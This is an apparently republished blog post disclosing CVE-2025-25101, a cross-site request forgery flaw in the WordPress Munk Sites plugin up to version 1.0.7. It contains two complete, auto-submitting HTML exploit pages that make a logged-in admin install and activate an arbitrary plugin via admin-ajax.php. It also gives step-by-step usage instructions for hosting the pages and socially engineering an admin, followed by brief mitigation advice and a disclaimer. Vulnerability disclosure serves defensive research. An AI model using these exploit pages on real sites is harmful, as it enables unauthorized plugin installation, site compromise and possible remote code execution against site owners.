Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

WordPress Munk Sites 1.0.7 Cross Site Request Forgery

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 265
# ? CVE-2025-25101 - WordPress Munk Sites Plugin <= 1.0.7 # ? CVE-2025-25101 - WordPress Munk Sites Plugin <= 1.0.7 - CSRF to Arbitrary Plugin Installation

## ? Overview
**CVE-2025-25101** is a **Cross-Site Request Forgery (CSRF)** vulnerability in the **MetricThemes Munk Sites** plugin for WordPress (versions ? **1.0.7**).
This vulnerability allows an **unauthenticated attacker** to **trick an admin into installing and activating arbitrary plugins**, potentially leading to **Remote Code Execution (RCE)** or **website compromise**.

## ? Affected Versions
- **Munk Sites Plugin** `<= 1.0.7`
- **WordPress** `Any version where the plugin is active`

---
## ?? Security Rating (CVSS Score)

| Score | Severity | Version | Vector String |
|--------|----------|---------|--------------|
| **9.6** | ? **CRITICAL** | 3.1 | `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H` |


## ? Exploit Description
### ?? How the Vulnerability Works:
The **CSRF flaw** in the **Munk Sites** plugin allows an attacker to force a logged-in **WordPress admin** to install and activate any WordPress plugin **without their consent**.
This is done by exploiting an **unprotected `admin-ajax.php` request** that lacks CSRF token verification.

### ? Exploit Workflow:
1. **The attacker crafts a malicious webpage containing the CSRF payload**.
2. **The victim (WordPress admin) visits the attacker's webpage**.
3. **The exploit silently sends requests to WordPress to install and activate an arbitrary plugin**.
4. **The plugin is installed and activated without any admin interaction**.

---

## ? Exploit Code
### **1?? CSRF Exploit - Install Plugin**
**This payload forces the victim to install the `hello-world` plugin.**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Installation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #5bc0de; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>? CVE-2025-25101</h1>
<h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
<h3>? Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">? Installing plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_install_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>? Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>
```

---

### **2?? CSRF Exploit - Activate Plugin**
**This payload forces the victim to activate the `hello-world` plugin.**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF Exploit - Plugin Activation</title>
<style>
body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
h1 { color: #d9534f; } h2 { color: #f0ad4e; }
.output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
.success { color: #5cb85c; font-weight: bold; }
</style>
</head>
<body onload="document.forms[0].submit()">
<h1>? CVE-2025-25101</h1>
<h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
<h3>? Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
<div class="output" id="output">? Activating plugin...</div>
<form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
<input type="hidden" name="action" value="cs_active_plugin">
<input type="hidden" name="plugin" value="hello-world">
</form>
<script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>? Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>
```

---

## ? How to Use
1. **Host the malicious HTML files (`install.html` and `activate.html`) on an attacker-controlled server.**
2. **Social engineer a WordPress admin to visit `install.html`.**
3. **Once the plugin is installed, trick them into visiting `activate.html`.**
4. **The `hello-world` plugin will be installed and activated without admin consent!**

---

## ? Mitigation
### ? How to Protect Your WordPress Site:
- **Upgrade to the latest version of the Munk Sites plugin** (if a patch is available).
- **Use a WordPress security plugin like Wordfence or Sucuri** to block CSRF attempts.
- **Restrict access to `admin-ajax.php`** using security rules in `.htaccess` or Nginx config.
- **Ensure that only authenticated and authorized users can install or activate plugins.**
- **Implement CSRF protection using `wp_nonce_field()` and `check_admin_referer()`.**

---




## ? Disclaimer
?? **This exploit is for educational and security research purposes only.**
?? **Unauthorized use against systems without explicit permission is illegal.**
?? **The author is not responsible for any misuse of this code.**

---

## ? Support & Contributions
If you find this research valuable, feel free to ? **star the repository** and contribute by reporting **new vulnerabilities**.

**_By: Nxploit | Khaled Alenazi_**
Social Media Share